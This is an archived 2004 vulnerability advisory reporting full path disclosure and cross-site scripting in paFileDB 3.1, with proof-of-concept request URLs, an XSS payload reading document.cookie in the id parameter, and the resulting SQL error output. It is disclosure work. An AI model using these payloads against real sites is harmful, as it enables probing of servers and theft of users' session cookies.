advisory-04.txt

advisory-04.txt: Posted Apr 28, 2004; Authored by DarkBicho | Site darkbicho.tk; paFileDB version 3.1 suffers from path disclosure and cross site scripting flaws.; tags | advisory, xss; SHA-256 | d5f47ce4fbc5d389d472a4f2644aa907ce5916533dbd1e734dcb4ffda99b5b1d; Download | Favorite | View

advisory-04.txt

Advisory: http://bichosoft.webcindario.com/advisory-04.txt


#########################################################################
###################### :.: DarkBicho :.: ################################
#                    #
#   PROGRAM: paFileDB              #
#   VERSION: 3.1              #
#   URL: http://www.phparena.net          #
#   BUG: Multiple vulnerabilities          #
#   DATE: 27/04/2004              #
#   AUTHOR: DarkBicho              #
#           WebSite: http://www.darkbicho.tk        #
#           Email: darkbicho@peru.com          #
#           Team: Security Wari Projects <www.swp-zone.org>    #
#                  #
#########################################################################
#########################################################################



1.- Vulnerabilities:
    ---------------


A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.

http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

and we get standard error messages, revealing the full path to the nuke 
engine scripting files:

Fatal error: Call to undefined function: locbar() in 
/home/site/includes/admin/login.php
on line 12

http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php

2. Cross-Site Scripting aka XSS:
   ----------------------------


  Cross-Site Scripting in id variable:


  
http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>


paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near 
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE 
cat_id = '''


3.- SOLUTION:
     ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
    Check the Video Gallery website for updates and official release 
details.


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "El pisto es y sera peruano"

5.- Contact
    -------

  WEB: http://www.darkbicho.tk
  EMAIL: darkbicho@peru.com


---------------------------------- [ EOF ] 
------------------------------------

_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

advisory-04.txt

advisory-04.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

advisory-04.txt

Share This

advisory-04.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems